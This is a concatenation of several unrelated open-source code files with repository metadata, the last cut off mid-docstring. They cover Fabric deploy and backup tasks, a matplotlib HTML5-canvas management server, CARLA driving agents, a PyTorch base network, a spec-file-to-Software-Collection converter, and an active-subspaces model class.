            monthly_tab = tab.new(command=monthly_command)
            monthly_tab.dom().on(1)
            monthly_tab.hour().on(3)
            monthly_tab.minute().on(0)
            changed = True
        if changed:
            tab.write()
    except:
        # Best-effort: report and continue so deploys are not blocked.
        print_exception()
        pass
@runs_once
def backup_daily():
    """Run the daily backup script unless a stale backup file exists.

    NOTE(review): env.current_backup_file is only assigned inside
    backup_for_deploy() — confirm it is defined when this task runs alone.
    """
    if not fabric.contrib.files.exists(env.current_backup_file):
        magic_run("%(backup_dir)s/%(daily_backup_script_name)s")
    else:
        abort("Backup FAILED. Previous backup did not complete. Please manually fix the server.")
def daily_backup_script():
    """Return the daily backup shell script, rendered against env.

    The script dumps the database, rotates a 7-day window of zips,
    snapshots the media dirs, and scps the media archive off-site.
    """
    script = """#!/bin/bash
source %(user_home)s/bin/virtualenvwrapper.sh
%(work_on)s cd %(project_name)s;
%(python)s manage.py dumpdata --indent 4 > %(current_backup_file)s
mv %(backup_dir)s/days-ago-6.zip %(backup_dir)s/days-ago-7.zip
mv %(backup_dir)s/days-ago-5.zip %(backup_dir)s/days-ago-6.zip
mv %(backup_dir)s/days-ago-4.zip %(backup_dir)s/days-ago-5.zip
mv %(backup_dir)s/days-ago-3.zip %(backup_dir)s/days-ago-4.zip
mv %(backup_dir)s/days-ago-2.zip %(backup_dir)s/days-ago-3.zip
mv %(backup_dir)s/days-ago-1.zip %(backup_dir)s/days-ago-2.zip
mv %(backup_dir)s/days-ago-0.zip %(backup_dir)s/days-ago-1.zip
zip -r9q %(backup_dir)s/days-ago-0.zip %(current_backup_file)s
rm %(current_backup_file)s
cd %(backup_dir)s; mkdir cur_images;
cp -R %(media_path)s/cms %(backup_dir)s/cur_images/
cp -R %(media_path)s/images %(backup_dir)s/cur_images/
cd %(backup_dir)s; zip -r9q cur_images2.zip cur_images
cd %(backup_dir)s; rm -rf cur_images
mv %(backup_dir)s/cur_images2.zip %(backup_dir)s/cur_images.zip
scp %(backup_dir)s/cur_images.zip %(offsite_backup_dir)s
""" % env
    # script = script.replace("\n","\\n")
    return script
def backup_weekly():
    """Run the weekly backup rotation script on the remote host."""
    magic_run("%(backup_dir)s/%(weekly_backup_script_name)s")
def weekly_backup_script():
    """Return the weekly backup shell script, rendered against env.

    Rotates a 5-week window, seeds week-0 from the latest daily zip,
    and scps the whole backup dir off-site.
    """
    script = """#!/bin/bash
mv %(backup_dir)s/weeks-ago-4.zip %(backup_dir)s/weeks-ago-5.zip
mv %(backup_dir)s/weeks-ago-3.zip %(backup_dir)s/weeks-ago-4.zip
mv %(backup_dir)s/weeks-ago-2.zip %(backup_dir)s/weeks-ago-3.zip
mv %(backup_dir)s/weeks-ago-1.zip %(backup_dir)s/weeks-ago-2.zip
mv %(backup_dir)s/weeks-ago-0.zip %(backup_dir)s/weeks-ago-1.zip
cp %(backup_dir)s/days-ago-0.zip %(backup_dir)s/weeks-ago-0.zip
cd %(backup_dir)s; scp * %(offsite_backup_dir)s
""" % env
    # script = script.replace("\n","\\n")
    return script
@runs_once
def backup_monthly():
    """Run the monthly backup snapshot script on the remote host."""
    magic_run("%(backup_dir)s/%(monthly_backup_script_name)s")
def monthly_backup_script():
    """Return the monthly backup shell script (date-stamped copy of week-0)."""
    script = """#!/bin/bash
cp %(backup_dir)s/weeks-ago-0.zip %(backup_dir)s/month-`date +%%F`.zip
""" % env
    # script = script.replace("\n","\\n")
    return script
def kill_pyc():
    """Delete all compiled .pyc files under the git checkout."""
    magic_run("%(work_on)s cd %(git_path)s;find . -iname '*.pyc' -delete")
@runs_once
def migrate():
    """Run django database migrations against the default database."""
    magic_run("%(work_on)s cd %(project_name)s; %(python)s manage.py migrate --database=default")
@runs_once
def syncdb():
    """Run django syncdb non-interactively against the default database."""
    magic_run("%(work_on)s cd %(project_name)s; %(python)s manage.py syncdb --noinput --database=default")
@runs_once
def deploy_media():
    """Sync media from the release tag, then restore the pull branch.

    Runs locally; failures are reported but do not abort the deploy.
    """
    try:
        local("%(work_on)s cd %(project_name)s; git checkout %(release_tag)s; %(python)s manage.py syncmedia --settings=%(settings_file)s;git checkout %(pull_branch)s" % env)
    except:
        print_exception()
def deploy_fast(with_media="True", force_pip_upgrade="False", use_unstable="False"):
    """Deploy without stopping the server: pull, install, migrate, reboot.

    Arguments arrive as strings because fab passes CLI args verbatim;
    they are converted to booleans case-insensitively.
    """
    force_pip_upgrade = force_pip_upgrade.lower() == "true"
    with_media = with_media.lower() == "true"
    use_unstable = use_unstable.lower() == "true"
    # backup_for_deploy()
    if with_media:
        deploy_media()
    pull()
    kill_pyc()
    quick_install_requirements(force_pip_upgrade=force_pip_upgrade, use_unstable=use_unstable)
    syncdb()
    migrate()
    if has_separate_celery_server():
        celery_pull()
    celery_restart()
    reboot()
def deploy_slow(with_media="True", force_pip_upgrade="False", use_unstable="False"):
    """Full deploy with downtime: stop, pull, upgrade everything, start.

    Arguments arrive as strings because fab passes CLI args verbatim;
    they are converted to booleans case-insensitively.
    """
    force_pip_upgrade = force_pip_upgrade.lower() == "true"
    with_media = with_media.lower() == "true"
    use_unstable = use_unstable.lower() == "true"
    if with_media:
        deploy_media()
    stop()
    # backup_for_deploy()
    pull()
    kill_pyc()
    safe_install_requirements(force_pip_upgrade=force_pip_upgrade, use_unstable=use_unstable)
    syncdb()
    migrate()
    if has_separate_celery_server():
        celery_pull()
    celery_restart()
    nginx_reboot()
    start()
def reset(repo, hash):
    """
    Reset all git repositories to specified hash.
    Usage:
        fab reset:repo=my_repo,hash=etcetc123
    """
    # NOTE(review): env.repo is set here but git_reset only reads env.hash —
    # confirm whether repo is consumed elsewhere (e.g. by invoke/git_reset).
    require("fab_hosts", provided_by=[production])
    env.hash = hash
    env.repo = repo
    invoke(git_reset)
def ssh_auth_me():
    """Append the local user's public SSH key to the remote authorized_keys.

    Prefers the DSA key; falls back to RSA when the DSA key is missing
    or empty.

    NOTE(review): the commands run under sudo, so '~' may expand to the
    privileged user's home rather than the deploy user's — confirm.
    """
    try:
        my_key = local("cat ~/.ssh/id_dsa.pub")
    except:
        my_key = ""
    if my_key == "":
        my_key = local("cat ~/.ssh/id_rsa.pub")
    sudo("mkdir ~/.ssh; chmod 700 ~/.ssh; touch ~/.ssh/authorized_keys; chmod 600 ~/.ssh/authorized_keys;")
    sudo("echo '%s' >> ~/.ssh/authorized_keys" % (my_key))
| {
"repo_name": "skoczen/qi-toolkit",
"path": "qi_toolkit/boltbase.py",
"copies": "1",
"size": "27252",
"license": "bsd-3-clause",
"hash": 542443995684853060,
"line_mean": 37.6553191489,
"line_max": 269,
"alpha_frac": 0.6307426978,
"autogenerated": false,
"ratio": 3.1006940493799067,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9180860283737722,
"avg_score": 0.010115292688437076,
"num_lines": 705
} |
"""A base for handling management of the h5 canvas backend.
Its jobs are as follows:
- Provide a standardised base port for clients to connect to
- Serve up the html wrapper page
- Provide a list of currently available plots (perhaps with a thumbnail)
- Manage the list of plots as time goes by
Simon Ratcliffe (sratcliffe@ska.ac.za)
Ludwig Schwardt (ludwig@ska.ac.za)
Copyright (c) 2010-2013, SKA South Africa
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
Neither the name of SKA South Africa nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import BaseHTTPServer
import simple_server
import base_page
import thread
import sys
import re
import socket
import time
import logging
logger = logging.getLogger("mplh5canvas.management_server")
# netifaces is an optional dependency used for better external-IP detection;
# fall back to socket-based lookup when it is not installed.
try:
    import netifaces
except ImportError:
    # Narrowed from a bare except: only a missing module should be silenced.
    netifaces = None
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    """HTTP handler serving the management pages for all registered canvases.

    Routes (see do_GET):
      /<n>       - full page showing all figures, optionally with layout n
      /figureN   - page showing only figure N (1-based)
      /thumbs    - thumbnail overview of all figures
    """
    # HTML fragments used to assemble the pages.
    base_html = base_page.base_html
    base_html_decoration = base_page.base_html_decoration
    base_html_canvii = base_page.base_html_canvii
    thumb_html = base_page.thumb_html
    thumb_inner = base_page.thumb_inner
    # Populated by H5Manager after it binds a port.
    h5m = None
    server_port = ""
    custom_content = None
    def do_GET(self):
        server_ip = self.connection.getsockname()[0]
        logger.info("Server ip for connection: %s " % server_ip)
        # Match an optional numeric layout id, e.g. "/2".
        match = re.compile("\/(\d*)$").match(self.path)
        ports = self.h5m._figures.keys()
        ports.sort()
        self.wfile.write(self.protocol_version + ' 200 OK\n\n')
        if match is not None:
            # All-figures page, with the requested layout applied client-side.
            req_layout = match.groups()[0]
            for port in ports:
                canvas = self.h5m._figures[port]
            req_layout = (req_layout == '' and "" or "set_layout(" + str(req_layout) + ");")
            bh = self.base_html + self.base_html_decoration + self.base_html_canvii
            self.wfile.write(bh.replace('<!--requested_layout-->',req_layout).replace('<!--server_ip-->',server_ip).replace('<!--server_port-->',self.server_port).replace('<!--canvas_top-->','105').replace('<!--canvas_left-->','10').replace('<!--canvas_position-->','absolute'))
        elif self.path.startswith("/figure"):
            # Single-figure page; figure numbers are 1-based in the URL.
            try:
                fig_no = int(self.path[7:]) - 1
            except ValueError:
                fig_no = 0
            if fig_no < 0: fig_no = 0
            # get the first figure by default
            try:
                port = ports[fig_no]
                custom_content = self.h5m._figures[port]._custom_content
                bh = self.base_html + self.base_html_canvii
                req_layout = "plot_if_possible(" + str(port) + ");"
                content = bh.replace('<!--requested_layout-->',req_layout).replace('<!--server_ip-->',server_ip).replace('<!--server_port-->',self.server_port).replace('<!--canvas_top-->','10').replace('<!--canvas_left-->','10').replace('<!--canvas_position-->','absolute')
                if custom_content is not None:
                    # A canvas may supply a wrapper page with a figure slot.
                    content = custom_content.replace("<!--figure-->", content)
                self.wfile.write(content)
            except IndexError:
                self.wfile.write("Invalid Figure number (" + str(fig_no+1) + ") specified.")
        elif self.path == "/thumbs":
            # for each figure, create a thumbnail snippet and slipstream the js for the preview
            figure_count = 0
            thumbs = ""
            for port in ports:
                canvas = self.h5m._figures[port]
                t = self.thumb_inner.replace("<id>",str(figure_count))
                t = t.replace("<!--thumbnail_port-->",str(port))
                t = t.replace("<!--width-->",str(canvas._width)).replace("<!--height-->",str(canvas._height))
                # Rename the canvas js object per-thumbnail so multiple
                # previews can coexist on one page.
                frame = str(canvas._frame).replace("\n","").replace(";c.",";c_t_" + str(figure_count) + ".").replace("{ c", "{ c_t_" + str(figure_count))
                header = str(canvas._header).replace("\n","")
                if frame.startswith("c."): frame = "c_t_" + str(figure_count) + frame[1:]
                thumbs += t.replace('<!--thumbnail_content-->',header + frame) + "\n"
                figure_count += 1
            # insert thumbnail code into base page
            self.wfile.write(self.thumb_html.replace("<!--thumbnail_body-->",thumbs))
        else:
            self.wfile.write("Not found...")
class H5Manager(object):
"""An H5 Canvas Manager.
Parameters
----------
port : integer
The base port on which to serve the managers web interface
"""
def __init__(self, base_port, limit):
self.ip = self._external_ip()
# find the next available port in multiples of 100 from base port
self._figures = {}
for x in range(limit):
port_to_try = base_port + x*100
try:
self._server = BaseHTTPServer.HTTPServer(('', port_to_try), RequestHandler)
self._thread = thread.start_new_thread(self._server.serve_forever, ())
self._wsserver = simple_server.WebSocketServer(('', port_to_try+1), self.management_request, simple_server.WebSocketRequestHandler)
self._wsthread = thread.start_new_thread(self._wsserver.serve_forever, ())
break
except Exception, e:
if x == limit - 1:
logger.error("Tried to find an available port pair from %i to %i, but none seemed available. You can only spawn %i python mplh5 instances on this machine.\nThis limit can be changed in init.py." % (base_port, base_port + (x-1)*100, limit))
sys.exit(1)
else:
logger.error("Failed to start management servers on ports (%i, %i). Trying another pair..." % (port_to_try, port_to_try+1))
logger.error(e)
time.sleep(0.05)
# we have a port :)
self.port = port_to_try
RequestHandler.h5m = self
RequestHandler.server_port = str(self.port)
self.url = "http://%s:%i" % (self.ip, self.port)
self._request_handlers = {}
print "============================================================================================"
print "Management interface active. Browse to %s to view all plots." % self.url
print "Alternatively, browse to %s/figure1 etc. to view individual figures." % self.url
print "============================================================================================"
sys.stdout.flush()
def _external_ip(self, preferred_prefixes=('eth', 'en')):
"""Return the external IPv4 address of this machine.
Attempts to use netifaces module if available, otherwise
falls back to socket.
Parameters
----------
preferred_prefixes : tuple
A tuple of string prefixes for network interfaces to match. e.g. ('eth','en') matches ethX and enX
with a preference for lowest number first (eth0 over eth3).
Returns
-------
ip : str or None
IPv4 address string (dotted quad). Returns None if
ip address cannot be guessed.
"""
if netifaces is None:
ips = [socket.gethostbyname(socket.gethostname())]
else:
preferred_ips = []
other_ips = []
for iface in netifaces.interfaces():
for addr in netifaces.ifaddresses(iface).get(netifaces.AF_INET, []):
if 'addr' in addr:
for prefix in preferred_prefixes:
if iface.startswith(prefix): preferred_ips.append(addr['addr'])
other_ips.append(addr['addr'])
# will duplicate those in preferred_ips but this doesn't matter as we only
# use other_ips if preferred is empty.
ips = preferred_ips + other_ips
if ips:
return ips[0]
else:
return "127.0.0.1"
def management_request(self, request):
self._request_handlers[request] = request.connection.remote_addr[0]
while True:
try:
line = request.ws_stream.receive_message()
request.ws_stream.send_message("update_thumbnails();".decode('utf-8'))
except Exception, e:
logger.debug("Removing registered management handler (%s)" % e)
if self._request_handlers.has_key(request): del self._request_handlers[request]
return
def tell(self):
recipients = ""
for r in self._request_handlers.keys():
try:
recipients += str(r.connection.remote_addr[0]) + " "
r.ws_stream.send_message("update_thumbnails();".decode('utf-8'))
except AttributeError:
logger.debug("Connection %s has gone. Closing..." % r.connection.remote_addr[0])
del self._request_handlers[request]
def add_figure(self, port, canvas):
"""Add a figure to the manager"""
self._figures[port] = canvas
self.tell()
def remove_figure(self, port):
"""Remove a figure from the manager"""
self._figures.pop(port)
self.tell()
def handle_base(self):
pass
def parse_web_cmd(self, s):
action = s[1:s.find(" ")]
args = s[s.find("args='")+6:-2].split(",")
method = getattr(self, "handle_%s" % action)
if method:
method(*args)
else:
self.handle_base()
| {
"repo_name": "Hojalab/mplh5canvas",
"path": "mplh5canvas/management_server.py",
"copies": "3",
"size": "10812",
"license": "bsd-3-clause",
"hash": -6913254020046609000,
"line_mean": 47.7027027027,
"line_max": 755,
"alpha_frac": 0.589345172,
"autogenerated": false,
"ratio": 4.169687620516776,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00555287105609114,
"num_lines": 222
} |
# A baseline town agent.
from agents.navigation.agent import Agent, AgentState
import numpy as np
from agents.navigation.local_planner import LocalPlanner
class RoamingAgent(Agent):
    """
    RoamingAgent implements a basic agent that navigates scenes making random
    choices when facing an intersection.
    This agent respects other vehicles; traffic lights are queried but not
    currently acted upon (see run_step).
    NOTE: need to re-create after each env reset
    """
    def __init__(self, env):
        """
        :param env: environment exposing the ego vehicle and the
            follow_traffic_lights flag
        """
        vehicle = env.vehicle
        follow_traffic_lights = env.follow_traffic_lights
        super(RoamingAgent, self).__init__(vehicle)
        self._proximity_threshold = 10.0  # meters
        self._state = AgentState.NAVIGATING
        self._local_planner = LocalPlannerModified(self._vehicle)
        self._follow_traffic_lights = follow_traffic_lights

    def compute_action(self):
        """Return the action array for the current step.

        BUG FIX: run_step() already returns the final np.array of
        [throttle or -brake, steer].  The previous implementation tried to
        unpack that array as (control, traffic_light) and then read
        ``.throttle`` off a plain float, which raised AttributeError.
        """
        return self.run_step()

    def run_step(self):
        """
        Execute one step of navigation.
        :return: np.ndarray [throttle, steer] when accelerating,
            or [-brake, steer] when braking
        """
        # is there an obstacle in front of us?
        hazard_detected = False
        # retrieve relevant elements for safe navigation, i.e.: traffic lights and other vehicles
        actor_list = self._world.get_actors()
        vehicle_list = actor_list.filter("*vehicle*")
        # NOTE(review): traffic lights are fetched but never consulted below.
        lights_list = actor_list.filter("*traffic_light*")
        # check possible obstacles
        vehicle_state, vehicle = self._is_vehicle_hazard(vehicle_list)
        if vehicle_state:
            self._state = AgentState.BLOCKED_BY_VEHICLE
            hazard_detected = True
        # check for the state of the traffic lights
        if hazard_detected:
            control = self.emergency_stop()
        else:
            self._state = AgentState.NAVIGATING
            # standard local planner behavior
            control = self._local_planner.run_step()
        throttle = control.throttle
        brake = control.brake
        steer = control.steer
        if brake == 0.0:
            return np.array([throttle, steer])
        else:
            # Braking is encoded as a negative first component.
            return np.array([-brake, steer])
class LocalPlannerModified(LocalPlanner):
    """LocalPlanner variant tweaked for use inside this environment."""
    def __del__(self):
        pass  # otherwise it deletes our vehicle object
    def run_step(self):
        return super().run_step(debug=False)  # otherwise by default shows waypoints, that interfere with our camera
class DummyTownAgent(Agent):
    """
    A simple agent for the town driving task.
    If the car is currently facing on a path towards the goal, drive forward.
    If the car would start drivign away, apply maximum brakes.
    """
    def __init__(self, env):
        """
        :param env: environment exposing the ego vehicle, the target
            location and the route planner
        """
        self.env = env
        super(DummyTownAgent, self).__init__(self.env.vehicle)
        self._proximity_threshold = 10.0  # meters
        self._state = AgentState.NAVIGATING
        self._local_planner = LocalPlannerModified(self._vehicle)
    def compute_action(self):
        # Returns np.ndarray [throttle, steer] or [-brake, steer].
        hazard_detected = False
        # retrieve relevant elements for safe navigation, i.e.: traffic lights and other vehicles
        actor_list = self._world.get_actors()
        vehicle_list = actor_list.filter("*vehicle*")
        # NOTE(review): lights_list is fetched but unused below.
        lights_list = actor_list.filter("*traffic_light*")
        # check possible obstacles
        vehicle_state, vehicle = self._is_vehicle_hazard(vehicle_list)
        if vehicle_state:
            self._state = AgentState.BLOCKED_BY_VEHICLE
            hazard_detected = True
        # Determine whether driving forward moves us toward the next route
        # node; if not, treat it as a hazard and brake.
        rotation = self.env.vehicle.get_transform().rotation
        forward_vector = rotation.get_forward_vector()
        origin = self.env.vehicle.get_location()
        destination = self.env.target_location
        node_list = self.env.route_planner._path_search(origin=origin, destination=destination)
        origin_xy = np.array([origin.x, origin.y])
        forward_xy = np.array([forward_vector.x, forward_vector.y])
        first_node_xy = self.env.route_planner._graph.nodes[node_list[0]]['vertex']
        first_node_xy = np.array([first_node_xy[0], first_node_xy[1]])
        target_direction_vector = first_node_xy - origin_xy
        target_unit_vector = np.array(target_direction_vector) / np.linalg.norm(target_direction_vector)
        # Projection of heading onto the route direction; negative means
        # the car is facing away from the route.
        vel_s = np.dot(forward_xy, target_unit_vector)
        if vel_s < 0:
            hazard_detected = True
        if hazard_detected:
            control = self.emergency_stop()
        else:
            self._state = AgentState.NAVIGATING
            # standard local planner behavior
            control = self._local_planner.run_step()
        throttle = control.throttle
        brake = control.brake
        steer = control.steer
        #print('tbsl:', throttle, brake, steer, traffic_light)
        if brake == 0.0:
            return np.array([throttle, steer])
        else:
            return np.array([-brake, steer])
| {
"repo_name": "rail-berkeley/d4rl",
"path": "d4rl/carla/town_agent.py",
"copies": "1",
"size": "5344",
"license": "apache-2.0",
"hash": 6374876813106817000,
"line_mean": 34.6266666667,
"line_max": 116,
"alpha_frac": 0.6236901198,
"autogenerated": false,
"ratio": 3.8893740902474527,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0013170948193391597,
"num_lines": 150
} |
'''A base network for handling common arguments in cortex models.
This is not necessary to use cortex: these are just convenience networks.
'''
import torch.nn as nn
import torch
from .utils import apply_nonlinearity, get_nonlinearity, finish_layer_1d
class BaseNet(nn.Module):
    '''Basic convenience network for cortex.

    Attributes:
        models: nn.Sequential container holding the network's layers.
        output_nonlinearity: name of the nonlinearity applied to the
            final output (None for linear output).
        states: list of intermediate activations recorded by forward().
    '''

    def __init__(self, nonlinearity='ReLU', output_nonlinearity=None):
        super(BaseNet, self).__init__()

        self.models = nn.Sequential()
        # Output nonlinearity is applied by name in forward(); hidden-layer
        # nonlinearity is resolved to a module/callable up front.
        self.output_nonlinearity = output_nonlinearity
        self.layer_nonlinearity = get_nonlinearity(nonlinearity)

    def forward(self,
                x: torch.Tensor,
                nonlinearity: str = None,
                **nonlinearity_args: dict) -> torch.Tensor:
        # Records every intermediate activation in self.states.
        self.states = []

        # None -> use the configured output nonlinearity; any other falsy
        # value (e.g. False, '') explicitly disables it.
        if nonlinearity is None:
            nonlinearity = self.output_nonlinearity
        elif not nonlinearity:
            nonlinearity = None

        for model in self.models:
            x = model(x)
            self.states.append(x)

        x = apply_nonlinearity(x, nonlinearity, **nonlinearity_args)
        return x

    def get_h(self, dim_h, n_levels=None):
        """Normalize a hidden-size spec into a list of layer widths."""
        if isinstance(dim_h, (list, tuple)):
            pass
        elif n_levels:
            dim_h = [dim_h for _ in range(n_levels)]
        else:
            dim_h = [dim_h]
        return dim_h

    def add_linear_layers(self,
                          dim_in,
                          dim_h,
                          dim_ex=None,
                          Linear=None,
                          **layer_args):
        """Append fully-connected hidden layers; return the final width.

        dim_ex, when given, is added to the input width of every layer
        after the first (e.g. for extra conditioning inputs).
        Returns dim_in unchanged when dim_h is empty.
        """
        Linear = Linear or nn.Linear

        if dim_h is None or len(dim_h) == 0:
            return dim_in

        for dim_out in dim_h:
            name = 'linear_({}/{})'.format(dim_in, dim_out)
            self.models.add_module(name, Linear(dim_in, dim_out))
            finish_layer_1d(
                self.models,
                name,
                dim_out,
                nonlinearity=self.layer_nonlinearity,
                **layer_args)
            dim_in = dim_out
            if dim_ex is not None:
                dim_in += dim_ex

        # NOTE(review): returns dim_out (without dim_ex) — confirm callers
        # that pass dim_ex account for the widened input themselves.
        return dim_out

    def add_output_layer(self, dim_in, dim_out, Linear=None):
        """Append a final linear projection to dim_out (no-op if None)."""
        Linear = Linear or nn.Linear

        if dim_out is not None:
            name = 'linear_({}/{})_{}'.format(dim_in, dim_out, 'out')
            self.models.add_module(name, Linear(dim_in, dim_out))
def make_subnet(from_network, n_layers):
    '''Build a BaseNet reusing the first ``n_layers`` layers of another net.

    The returned network shares its layer parameters with the source
    network; nothing is copied.

    Args:
        from_network: Network whose leading layers are reused.
        n_layers: Number of leading layers to take.

    Returns:
        A BaseNet wrapping the shared layers.
    '''
    subnet = BaseNet()
    subnet.models = from_network.models[:n_layers]
    return subnet
| {
"repo_name": "rdevon/cortex",
"path": "cortex/built_ins/networks/base_network.py",
"copies": "1",
"size": "2899",
"license": "bsd-3-clause",
"hash": 8793533040607533000,
"line_mean": 26.875,
"line_max": 73,
"alpha_frac": 0.5484649879,
"autogenerated": false,
"ratio": 3.9766803840877913,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 104
} |
"""A base Transformer.
Used by Convertor to perform actual transformation of a specfile.
Operates with transformer plugins defined in `transformers` package.
"""
import re
from spec2scl import specfile
class Transformer(object):
    """A base Transformer class.

    Converts tags and macro definitions in a conventional
    spec file into a Software Collection spec file.
    """

    # Registry of transformer plugin classes, populated by the
    # register_transformer class decorator.
    subtransformers = []

    def __init__(self, options=None):
        """Initialize the transformer.

        Args:
            options: optional dict of conversion options; missing keys are
                filled in with defaults.  BUG FIX: previously the default
                was a mutable ``{}`` argument that ``setdefault`` mutated,
                leaking option state between instances.  When a dict is
                passed, it is still used (and mutated) directly, preserving
                the original caller-visible behavior.
        """
        if options is None:
            options = {}
        self.options = options
        self.options.setdefault('skip_functions', [])
        self.options.setdefault('no_meta_runtime_dep', False)
        self.options.setdefault('no_meta_buildtime_dep', False)
        self.options.setdefault('scl_deps', True)
        self.transformer_methods = self.collect_transformer_methods()

    @classmethod
    def register_transformer(cls, t):
        """Add a transformer to subtransformers list.

        Used as a class decorator for transformer plugins.
        """
        cls.subtransformers.append(t)
        return t

    def collect_transformer_methods(self):
        """Return a list of subtransformer methods decorated with matches.

        Methods listed in the 'skip_functions' option are excluded.

        Returns:
            list of (<method>, <pattern>, <one line>, <sections>)
        """
        transformers = []

        for method in vars(type(self)).values():
            if hasattr(method, 'matches') and method.__name__ not in self.options['skip_functions']:
                for method_number in range(len(method.matches)):
                    transformers.append(
                        (getattr(self, method.__name__), method.matches[method_number],
                         method.one_line[method_number], method.sections[method_number]))

        return transformers

    def transform_one_liners(self, original_spec, section_name, section_text):
        """Apply transformation function to each line in the spec section."""
        one_liners = list(filter(lambda x: x[2], self.transformer_methods))
        split_section = section_text.splitlines()
        for index, line in enumerate(split_section):
            for func, pattern, _, sections in one_liners:
                if section_name in sections and pattern.search(line):
                    # let all the patterns modify the line
                    line = func(original_spec, pattern, line)
            split_section[index] = line

        return '\n'.join(split_section)

    def transform_more_liners(self, original_spec, section_name, section_text):
        """Apply transformation function to whole spec section."""
        more_liners = filter(lambda x: not x[2], self.transformer_methods)
        for func, pattern, _, sections in more_liners:
            if section_name in sections and pattern.search(section_text):
                section_text = func(original_spec, pattern, section_text)

        return section_text

    def transform(self, original_spec, transformers=[]):
        """Initialize subtransformer plugins and perform
        conversion by each of them.

        Args:
            original_spec: the spec file text to convert.
            transformers: pre-built subtransformer instances; when empty,
                instances are created from the registered plugin classes.
                (Read-only here, so the mutable default is harmless.)

        Returns:
            converted spec file as a Specfile object
        """
        spec = specfile.Specfile(original_spec)
        import spec2scl.transformers  # noqa
        self.subtransformers = transformers or map(
            lambda c: c(options=self.options), type(self).subtransformers)

        for subtrans in self.subtransformers:
            spec = subtrans._transform(original_spec, spec)

        return spec

    def _transform(self, original_spec, spec):
        """Run _transform_section over every section of the Specfile."""
        for i, section in enumerate(spec.sections):
            spec.sections[i] = (
                section[0], self._transform_section(original_spec, section[0], section[1]))
        return spec

    def _transform_section(self, original_spec, section_name, section_text):
        """Transform one section of a specfile.

        Apply transformation methods applicable to the whole
        section and each of it's lines.
        """
        section_text = self.transform_one_liners(
            original_spec, section_name, section_text)
        section_text = self.transform_more_liners(
            original_spec, section_name, section_text)
        return section_text

    # these methods are helpers for the actual transformations

    def get_original_name(self, original_spec):
        """Return the name of the package as defined in the specfile."""
        name_match = re.compile(r'Name:\s*([^\s]+)').search(original_spec)
        if name_match:
            return name_match.group(1)
        else:
            return 'TODO'
| {
"repo_name": "sclorg/spec2scl",
"path": "spec2scl/transformer.py",
"copies": "2",
"size": "4517",
"license": "mit",
"hash": 4662356550640623000,
"line_mean": 36.6416666667,
"line_max": 100,
"alpha_frac": 0.6309497454,
"autogenerated": false,
"ratio": 4.41544477028348,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.604639451568348,
"avg_score": null,
"num_lines": null
} |
""" A basic class for approximation, integration, and optimization with
active subspaces."""
import numpy as np
from utils.misc import process_inputs_outputs, process_inputs
from utils.simrunners import SimulationRunner, SimulationGradientRunner
from utils.plotters import eigenvalues, subspace_errors, eigenvectors, sufficient_summary
from response_surfaces import ActiveSubspaceResponseSurface
from integrals import integrate, av_integrate
from optimizers import minimize
from subspaces import Subspaces
from gradients import local_linear_gradients, finite_difference_gradients
from domains import UnboundedActiveVariableDomain, BoundedActiveVariableDomain, \
UnboundedActiveVariableMap, BoundedActiveVariableMap
import time
class ActiveSubspaceReducedModel():
"""
A class for approximation, optimization, and integration with active
subspaces.
:cvar bool bounded_inputs: flag that tells if the simulation's inputs
are bounded by an m-dimensional hypercube and equipped with a
uniform probability density function (True) or if they are unbounded
and equipped with a standard Gaussian density function (False).
:cvar ndarray X: M-by-m matrix that contains a set of simulation inputs.
Each row of `X` is a point in the simulations m-dimensional parameter
space. These points are used to train response surfaces. They are also
used in plots when analyzing the simulation.
:cvar ndarray f: M-by-1 matrix that contains the simulation outputs that
correspond to the rows of `X`. `f` is used as training data for
response surfaces.
:cvar int m: The dimension of the simulation inputs.
:cvar int n: The dimension of the active subspace. Typically `n` is less
than `m`---often much less.
:cvar function fun: A function that interfaces with the simulation. It
should take an ndarray of shape 1-by-m (e.g., a row of `X`), and it
should return a scalar. That scalar is the quantity of interest from
the simulation.
:cvar function dfun: A function that interfaces with the simulation. It
should take an ndarray of shape 1-by-m (e.g., a row of `X`), and it
should return the gradient of the quantity of interest as an ndarray of
shape 1-by-m.
:cvar active-subspaces.response_surfaces.ActiveSubspaceResponseSurface as_respsurf:
A response surface initialized and trained while building the model.
Once trained, it can be used as a cheap surrogate for the simulation
code.
:cvar float Rsqr: The R-squared coefficient for the response surface.
**Notes**
This class contains several convenient methods for working with active
subspaces. These methods are mostly wrappers to other parts of the library.
The methods are structured to be used with relatively little knowledge of
how active subspaces work. At best, this class provides a useful surrogate
for an expensive simulation with many input parameters.
There are two ways to build the model: one that uses given data (see the
method `build_from_data`) and the other that uses given interfaces to the
simulation (see the method `build_from_interface`). With a simulation
interface, the code is able to build response surfaces on its own design
sets, i.e., its own choice of points. Also, the choices for building
response surfaces are better with a given interface. However, one can still
